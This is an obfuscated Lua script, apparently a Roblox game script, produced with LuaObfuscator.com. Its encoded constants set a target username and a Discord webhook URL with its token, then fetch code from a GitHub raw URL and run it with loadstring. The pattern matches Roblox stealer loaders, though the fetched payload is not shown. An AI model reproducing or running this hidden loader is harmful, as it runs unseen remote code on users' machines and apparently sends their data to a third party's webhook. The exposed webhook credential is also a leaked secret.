--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v102=v5(v84,v19);v19=nil;return v102;else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/(2^(v32-((1638 -(1523 + 114)) -0))))%((4 -(2 + 0))^(((v33-(620 -(555 + (91 -27)))) -(v32-(932 -(857 + 74)))) + 1)) ;return v86-(v86%(569 -(367 + 201))) ;end end else local v87=927 -(214 + 713) ;local v88;while true do if (v87==0) then v88=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and ((1943 -(68 + 997)) -(282 + 595))) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37=117 -(32 + 85) ;local v38;local v39;local v40;local v41;while true do if (0==v37) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;v37=958 -(892 + 65) ;end if (v37==(2 -1)) then return (v41 * (31011612 -14234396)) + (v40 * 65536) + (v39 * (469 -(563 -(87 + 263)))) + v38 ;end end end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(444 -(416 + 26))) then v47=v20(v44,201 -((213 -146) + 113) ,31);v48=((v20(v44,24 + 4 + 4 )==(2 -1)) and  -1) or (1 + 0) ;v42=11 -8 ;end if ((955 -(802 + 150))==v42) then if (v47==(0 -0)) then if (v46==(0 -(0 -0))) then return v48 * (0 + 0) ;else v47=1;v45=997 -(915 + 82) ;end elseif (v47==(5796 -3749)) then return ((v46==0) and (v48 * ((1 + (438 -(145 + 293)))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2210 -(1069 + 118)) ) * (v45 + (v46/((4 -2)^52))) ;end if (v42==(1 -0)) then v45=1;v46=(v20(v44,1 + 0 ,35 -15 ) * ((2 + 0)^(823 -(368 + 423)))) + v43 ;v42=6 -4 ;end if (v42==(18 -(10 + 8))) then v43=v23();v44=v23();v42=3 -(432 -(44 + 386)) ;end end end local function v25(v49)local v50=1486 -(998 + 488) ;local v51;local v52;while true do if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=2 + 0 ;end if ((775 -(201 + 571))==v50) then return v6(v52);end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(1138 -((975 -(814 + 45)) + 1022))) then return "";end end v50=4 -3 ;end if (v50==((4 -2) + 0)) then v52={};for v91=3 -2 , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=10 -7 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=166 -(9 + 157) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((3 -2)~=v53) then else v56=nil;v57=nil;v53=2;end if (v53==(1828 -(1195 + 629))) then while true do if (v54~=(1 -0)) then else local v99=405 -(118 + 287) ;while true do if (v99~=1) then else v54=2;break;end if (v99==(241 -(187 + 54))) then local v104=780 -(162 + 618) ;while true do if ((1 + 0)~=v104) then else v99=1 + 0 ;break;end if ((0 -0)~=v104) then else v57=nil;v58=nil;v104=4 -3 ;end end end end end if (v54~=(2 -0)) then else v59=nil;v60=nil;v54=3;end if (v54~=3) then else v61=nil;while true do local v103=0 + 0 ;while true do if (v103~=(1636 -(1373 + 263))) then else local v105=0;local v106;while true do if (v105~=0) then else v106=1000 -(451 + 549) ;while true do if (v106~=(1 -0)) then else v103=1;break;end if (v106~=(0 + 0)) then else local v146=0 + 0 ;while true do if (v146~=(0 + 0)) then else if (v55~=(2 -0)) then else local v168=0 -0 ;while true do local v172=0 + 0 ;while true do if (v172==0) then if (v168~=(1385 -(746 + 638))) then else return v59;end if ((0 + 0)==v168) then local v179=0;while true do if (v179~=(2 -1)) then else v168=1 + 0 ;break;end if (v179==0) then for v183=1 -0 ,v23() do local v184=341 -(218 + 123) ;local v185;local v186;while true do if (v184==(1581 -(1535 + 46))) then v185=0 + 0 ;v186=nil;v184=1;end if ((1 + 0)==v184) then while true do if (v185~=(0 + 0)) then else v186=v21();if (v20(v186,561 -(306 + 254) ,1 + 0 )==(753 -(239 + 514))) then local v190=0 -0 ;local v191;local v192;local v193;local v194;while true do if (v190~=(1468 -(899 + 568))) then else v193=nil;v194=nil;v190=1 + 1 ;end if (v190~=(0 + 0)) then else v191=0 + 0 ;v192=nil;v190=1 + 0 ;end if (v190~=(4 -2)) then else while true do if (v191~=(1202 -(373 + 829))) then else local v195=603 -(268 + 335) ;while true do if ((732 -(476 + 255))==v195) then v191=1;break;end if (v195~=(290 -(60 + 230))) then else v192=v20(v186,574 -(426 + 146) ,1 + 2 );v193=v20(v186,1460 -(282 + 1174) ,6);v195=812 -(569 + 242) ;end end end if (v191==3) then if (v20(v193,8 -5 ,5 -2 )==(239 -(64 + 174))) then v194[1 + 3 ]=v61[v194[5 -1 ]];end v56[v183]=v194;break;end if (v191~=1) then else local v197=0 + 0 ;local v198;while true do if (v197~=(216 -(42 + 174))) then else v198=0 + 0 ;while true do if (v198~=(1025 -(706 + 318))) then else v191=2;break;end if (v198~=(1251 -(721 + 530))) then else v194={v22(),v22(),nil,nil};if (v192==(0 + 0)) then local v203=1580 -(1183 + 397) ;while true do if (v203~=(0 -0)) then else v194[3]=v22();v194[3 + 1 ]=v22();break;end end elseif (v192==(701 -(271 + 429))) then v194[3 + 0 ]=v23();elseif (v192==(1502 -(1408 + 92))) then v194[1089 -(461 + 625) ]=v23() -((1290 -(993 + 295))^16) ;elseif (v192~=3) then else local v212=1975 -(1913 + 62) ;local v213;while true do if (v212==0) then v213=0;while true do if (v213~=(0 + 0)) then else v194[1174 -(418 + 753) ]=v23() -((5 -3)^(7 + 9)) ;v194[1 + 3 ]=v22();break;end end break;end end end v198=1 + 0 ;end end break;end end end if (v191==2) then local v199=0 + 0 ;local v200;while true do if (v199~=(529 -(406 + 123))) then else v200=0 -0 ;while true do if ((1769 -(1749 + 20))==v200) then if (v20(v193,1,1662 -(1477 + 184) )==(1 -0)) then v194[2]=v61[v194[1 + 1 ]];end if (v20(v193,1324 -(1249 + 73) ,1 + 1 )==(1146 -(466 + 679))) then v194[3]=v61[v194[3]];end v200=2 -1 ;end if (v200==(305 -(244 + 60))) then v191=3;break;end end break;end end end end break;end end end break;end end break;end end end for v187=2 -1 ,v23() do v57[v187-(2 -1) ]=v28();end v179=1;end end end break;end end end end if (v55~=(1900 -(106 + 1794))) then else local v169=0 + 0 ;local v170;while true do if (0~=v169) then else v170=0 + 0 ;while true do if (v170==(0 -0)) then v56={};v57={};v170=2 -1 ;end if ((115 -(4 + 110))~=v170) then else v58={};v59={v56,v57,nil,v58};v170=1 + 1 ;end if (v170==(1615 -(1565 + 48))) then v55=104 -(17 + 86) ;break;end end break;end end end v146=1139 -(782 + 356) ;end if (v146~=(1 + 0)) then else v106=1 -0 ;break;end end end end break;end end end if (v103~=1) then else if (1==v55) then local v107=0 -0 ;local v108;while true do if (v107==0) then v108=0 -0 ;while true do if (v108==(1093 -(975 + 117))) then local v161=166 -(122 + 44) ;while true do if (v161==(1 -0)) then v108=2;break;end if ((0 -0)~=v161) then else for v173=3 -2 ,v60 do local v174=0 + 0 ;local v175;local v176;local v177;while true do if (v174==(0 + 0)) then local v178=0 -0 ;while true do if (v178==(1019 -(697 + 321))) then v174=1 -0 ;break;end if (v178==0) then v175=0 -0 ;v176=nil;v178=1;end end end if (v174~=(66 -(30 + 35))) then else v177=nil;while true do if (v175~=(0 + 0)) then else local v180=0 -0 ;local v181;while true do if (v180~=0) then else v181=1257 -(1043 + 214) ;while true do if (v181~=1) then else v175=1;break;end if (v181==(0 -0)) then local v189=0;while true do if ((1212 -(323 + 889))==v189) then v176=v21();v177=nil;v189=1 -0 ;end if (v189==(2 -1)) then v181=1;break;end end end end break;end end end if (v175~=(1228 -(322 + 905))) then else if (v176==(581 -(361 + 219))) then v177=v21()~=(1189 -(449 + 740)) ;elseif (v176==(322 -(53 + 267))) then v177=v24();elseif (v176~=(1 + 2)) then else v177=v25();end v61[v173]=v177;break;end end break;end end end v59[3]=v21();v161=414 -(15 + 398) ;end end end if (v108~=(0 -0)) then else local v162=982 -(18 + 964) ;local v163;while true do if (v162==(0 + 0)) then v163=0;while true do if (v163~=(3 -2)) then else v108=1899 -(260 + 1638) ;break;end if ((0 + 0)~=v163) then else v60=v23();v61={};v163=1 + 0 ;end end break;end end end if (v108~=(852 -(20 + 830))) then else v55=2;break;end end break;end end end break;end end end break;end if (v54==(0 + 0)) then local v100=126 -(116 + 10) ;local v101;while true do if (v100~=(0 -0)) then else v101=0 + 0 ;while true do if (1~=v101) then else v54=2 -1 ;break;end if (v101==0) then local v109=0;while true do if ((1205 -(902 + 303))~=v109) then else v55=738 -(542 + 196) ;v56=nil;v109=1;end if (v109~=(1 -0)) then else v101=1 -0 ;break;end end end end break;end end end end break;end if (v53~=2) then else v58=nil;v59=nil;v53=3;end if (v53==(1 + 2)) then v60=nil;v61=nil;v53=3 + 1 ;end if (v53~=(0 + 0)) then else v54=214 -(22 + 192) ;v55=nil;v53=2 -1 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v89=0,v76 do if (v89>=v70) then v74[v89-v70 ]=v75[v89 + 1 ];else v78[v89]=v75[v89 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v90=0;while true do if (v90==0) then v80=v68[v72];v81=v80[1];v90=1;end if (v90==1) then if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81==0) then v78[v80[2]]=v80[3]~=0 ;else local v111=v80[2];local v112,v113=v71(v78[v111](v13(v78,v111 + 1 ,v80[3])));v73=(v113 + v111) -1 ;local v114=0;for v133=v111,v73 do v114=v114 + 1 ;v78[v133]=v112[v114];end end elseif (v81>2) then v78[v80[2]]=v64[v80[3]];else v78[v80[2]]=v80[3];end elseif (v81<=5) then if (v81==4) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=6) then local v123=0;local v124;while true do if (v123==0) then v124=v80[2];v78[v124]=v78[v124](v13(v78,v124 + 1 ,v73));break;end end elseif (v81>7) then v78[v80[2]]=v80[3]~=0 ;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=12) then if (v81<=10) then if (v81==9) then do return;end else do return;end end elseif (v81==11) then local v125=0;local v126;local v127;while true do if (v125==0) then v126=v80[2];v127=v78[v80[3]];v125=1;end if (v125==1) then v78[v126 + 1 ]=v127;v78[v126]=v127[v80[4]];break;end end else v78[v80[2]]();end elseif (v81<=14) then if (v81>13) then local v128=0;local v129;while true do if (v128==0) then v129=v80[2];v78[v129]=v78[v129](v13(v78,v129 + 1 ,v73));break;end end else local v130=0;local v131;local v132;while true do if (v130==1) then v78[v131 + 1 ]=v132;v78[v131]=v132[v80[4]];break;end if (0==v130) then v131=v80[2];v132=v78[v80[3]];v130=1;end end end elseif (v81<=15) then v78[v80[2]]();elseif (v81>16) then v78[v80[2]]=v80[3];else local v141=0;local v142;local v143;local v144;local v145;while true do if (v141==2) then for v165=v142,v73 do v145=v145 + 1 ;v78[v165]=v143[v145];end break;end if (v141==1) then v73=(v144 + v142) -1 ;v145=0;v141=2;end if (v141==0) then v142=v80[2];v143,v144=v71(v78[v142](v13(v78,v142 + 1 ,v80[3])));v141=1;end end end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D65030E3O00417A7572506C617973546869733303093O00557365724E616D653203013O002003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O323038333533313531302O372O3933342F39325456556F4C4A2O475435376D4E32586B6D77314F5A577350517A52436D385A7A546B50757A5770644E7867424F783347374A345761694C783078662O353630447A33030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012033O00013O0030053O000200030012033O00013O0030053O000400050012033O00013O0030053O000600070012033O00083O001203000100093O00200B00010001000A0012110003000B4O0008000400014O0001000100044O00065O00022O000C3O000100012O000A3O00017O00",v9(),...);end
